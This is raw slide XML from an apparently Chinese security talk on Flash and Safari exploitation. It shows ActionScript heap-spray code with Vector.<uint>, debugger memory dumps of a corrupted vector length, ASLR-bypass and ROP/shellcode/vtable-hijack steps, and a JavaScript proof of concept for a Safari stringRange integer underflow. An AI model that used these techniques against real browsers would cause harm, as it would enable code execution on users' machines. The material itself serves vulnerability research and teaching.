            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如何构造大量连续内存？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155700" y="1167689"/>
            <a:ext cx="6849782" cy="2068569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010726" y="3540168"/>
            <a:ext cx="82856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申请了</a:t>
            </a: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zh-CN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个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大小是</a:t>
            </a:r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0x40MB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的</a:t>
            </a:r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FLASH vector&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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uint</a:t>
            </a:r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zh-CN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对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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1075765" y="4367298"/>
            <a:ext cx="8139953" cy="198867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44118" y="2259106"/>
            <a:ext cx="325281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引入老版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>FLASH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Version&lt;18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3355511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770965" y="1299883"/>
            <a:ext cx="1134035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			while (_local_1 &lt; 0x4) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>				this.vector_uint_array[_local_1] = new Vector.&lt;uint&gt;();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>				_local_1++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>			};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>			_local_1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>			for (; _local_1 &lt; 4; _local_1++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>				_local_2 = (this.vector_uint_array[_local_1] as Vector.&lt;uint&gt;);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_local_2.length =0x1000000-0x10;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>				_local_2[0] =  0xFEEDBABE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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1801299" y="383414"/>
            <a:ext cx="913519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申请了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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zh-CN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个大小是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x40MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN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的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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FLASH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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vector&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="32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uint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对象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7348085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1083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为什么选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FLASH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vector&lt;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uint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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81953" y="932795"/>
            <a:ext cx="5755342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0:033&gt; dd 13ea0000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0000  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00fffff0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>05d2e000 feedbabe 00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0010  00000001 00000001 00000001 00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0020  00000001 00000001 00000001 00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0030  00000001 00000001 00000001 00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0040  00000001 00000001 00000001 00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0050  00000001 00000001 00000001 00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0060  00000001 00000001 00000001 00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0070  00000001 00000001 00000001 00000001</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281953" y="3783572"/>
            <a:ext cx="57553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55700" y="3678268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/>
              <a:t>0:033&gt; dd 13ea0000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0000  80000002 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>80000002</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>80000002</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>80000002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0010  80000002 80000002 80000002 80000002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0020  80000002 80000002 80000002 80000002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0030  80000002 80000002 80000002 80000002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0040  80000002 80000002 80000002 80000002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0050  80000002 80000002 80000002 80000002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0060  80000002 80000002 80000002 80000002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>13ea0070  80000002 80000002 80000002 80000002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544233" y="3142301"/>
            <a:ext cx="527182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当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>vector&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>uint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>被覆盖成后，我们</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>获得良好的越界读写能力，并且</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>越界读写时不会崩溃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70322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699" y="409575"/>
            <a:ext cx="821241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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>中监控</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>vector&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>uint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>是否</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>覆盖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563097" y="1388640"/>
            <a:ext cx="6171626" cy="18158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while(array_2[0][0x3000]==0xBABEFACE</a:t>
            </a:r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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>xploit()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4500282" y="4403548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5414682" y="4403548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6329082" y="4403548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7243482" y="4403548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3245224" y="4403548"/>
            <a:ext cx="1255058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8157881" y="4403548"/>
            <a:ext cx="1452283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objectarray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4500282" y="5219336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9" name="圆角矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414682" y="5219336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0" name="圆角矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6329082" y="5219336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1" name="圆角矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7243482" y="5219336"/>
            <a:ext cx="914400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vector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3245224" y="5219336"/>
            <a:ext cx="1255058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3" name="圆角矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8157881" y="5219336"/>
            <a:ext cx="1452283" cy="408623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objectarray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4" name="右箭头 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266815" y="5219336"/>
            <a:ext cx="2296220" cy="484632"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF0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5" name="右箭头 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266815" y="4403548"/>
            <a:ext cx="978408" cy="484632"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF0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27" name="直接箭头连接符 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="24" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2697748" y="3092826"/>
            <a:ext cx="1865287" cy="2368826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73283056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2549"/>
            <a:ext cx="12192000" cy="341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9650812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6228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利用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JavaScriptArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对象来做信息泄露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807536" y="992530"/>
            <a:ext cx="6403085" cy="256461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413461" y="3897450"/>
            <a:ext cx="568889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24c30000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66b1a98c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024546c0 00000000 00000005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24c30010 0000000f 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24c30028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24c30028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00000000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24c30020 00000000 03844e10 00000000 0000000f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24c30030 00000010 00000000 0c0c0c0c 000e686e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24c30040 0c0c0c0c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24c30050 0c0c0c0c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24c30060 0c0c0c0c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0c0c0c0c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24c30070 0c0c0c0c 80000002 00000000 00000000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上箭头 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7700683" y="2985247"/>
            <a:ext cx="430305" cy="978408"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF0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135906" y="261591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泄露模块地址绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ASLR</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="上箭头 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2948771">
            <a:off x="9543449" y="2356038"/>
            <a:ext cx="636857" cy="2236825"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39732"/>
              <a:gd name="adj2" fmla="val 44791"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF0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9166492" y="2317342"/>
            <a:ext cx="3025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泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>JavaScriptArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对象地址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415191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9212" y="96353"/>
            <a:ext cx="840621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01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>越界读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>的虚表指针，获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>对象地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>rop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>，放置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>，劫持虚表指针</a:t>
            </a:r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1084729" y="1192306"/>
            <a:ext cx="10309412" cy="538778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051890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演示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/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485678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6553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01.Safari  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>stringRange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>整数下溢出漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>poc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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1219201" y="1342768"/>
            <a:ext cx="7801232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while(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>str.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;0x100000-0x80){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=str+str1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>r = /.*\\s.*/gm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>var s = \"\\na\\n\\n"+str+"\\n\\n\\n\\ne\\n\\u0082\\u0d2b\\u1fd8\\u0093aaaaaaaaaaaaaaaaaaa\"; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>a=s.replace(r,'x')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>(a);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09131" y="3621741"/>
            <a:ext cx="1079968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 for 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= 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>maxCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rangeCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>            if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int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srcLen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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>substringRanges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].length) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                if (source.is8Bit())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>StringImpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>copyChars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(buffer + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>bufferPos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, source.characters8() + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>substringRanges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].position, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>srcLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>StringImpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>copyChars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(buffer + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>bufferPos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, source.characters16() + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>substringRanges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>position, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>srcLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>);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/>
              <a:t>bufferPos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>srcLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
